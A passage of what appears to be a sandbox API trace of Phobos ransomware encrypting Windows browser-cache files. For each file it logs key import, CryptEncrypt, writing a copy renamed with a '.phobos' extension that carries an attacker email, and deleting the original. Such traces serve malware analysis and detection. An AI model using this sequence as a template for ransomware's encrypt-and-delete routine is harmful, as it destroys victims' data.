files\\low\\content.ie5\\yg1r61z8\\adex[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.196] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.196] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.197] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.197] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.197] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91dd, lpOverlapped=0x0) returned 1 [0185.202] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91e0, dwBufLen=0x91e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91e0) returned 1 [0185.202] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x91e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x91e0, lpOverlapped=0x0) returned 1 [0185.204] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0185.204] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.204] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.204] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.204] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.204] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.204] CloseHandle (hObject=0x160) returned 1 [0185.204] CloseHandle (hObject=0x14c) returned 1 [0185.204] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js")) returned 1 [0185.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.206] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=21083) returned 1 [0185.206] CloseHandle (hObject=0x14c) returned 1 [0185.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js")) returned 0x2020 [0185.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.206] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.206] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.207] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.207] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.207] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x525b, lpOverlapped=0x0) returned 1 [0185.231] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5260, dwBufLen=0x5260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5260) returned 1 [0185.231] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5260, lpOverlapped=0x0) returned 1 [0185.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0185.233] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.233] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0185.233] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.233] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0185.233] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.233] CloseHandle (hObject=0x14c) returned 1 [0185.233] CloseHandle (hObject=0x160) returned 1 [0185.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adsWrapperMSNI[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adswrappermsni[1].js")) returned 1 [0185.255] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.262] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=33303) returned 1 [0185.262] CloseHandle (hObject=0x160) returned 1 [0185.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg")) returned 0x2020 [0185.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.262] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.262] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.263] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.263] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8217, lpOverlapped=0x0) returned 1 [0185.575] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8220, dwBufLen=0x8220 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8220) returned 1 [0185.575] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8220, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8220, lpOverlapped=0x0) returned 1 [0185.576] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0185.576] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.576] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0185.576] CryptDestroyKey (hKey=0xa32de8) returned 1 [0185.576] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x132, lpOverlapped=0x0) returned 1 [0185.577] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.577] CloseHandle (hObject=0x160) returned 1 [0185.577] CloseHandle (hObject=0x14c) returned 1 [0185.577] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg")) returned 1 [0185.578] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.578] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=325) returned 1 [0185.578] CloseHandle (hObject=0x14c) returned 1 [0185.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png")) returned 0x2020 [0185.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.579] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.579] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.580] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.580] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.580] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x145, lpOverlapped=0x0) returned 1 [0185.613] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150, dwBufLen=0x150 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150) returned 1 [0185.613] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x150, lpOverlapped=0x0) returned 1 [0185.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0185.614] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.614] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.614] CryptDestroyKey (hKey=0xa328a8) returned 1 [0185.614] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.614] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.614] CloseHandle (hObject=0x14c) returned 1 [0185.614] CloseHandle (hObject=0x160) returned 1 [0185.614] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb56xto[1].png")) returned 1 [0185.615] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.615] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5420) returned 1 [0185.615] CloseHandle (hObject=0x160) returned 1 [0185.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg")) returned 0x2020 [0185.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.616] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.616] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBALZyp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbalzyp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.616] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.616] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.616] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x152c, lpOverlapped=0x0) returned 1 [0185.750] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1530, dwBufLen=0x1530 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1530) returned 1 [0185.750] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1530, lpOverlapped=0x0) returned 1 [0185.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0185.751] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.751] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.751] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.751] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, 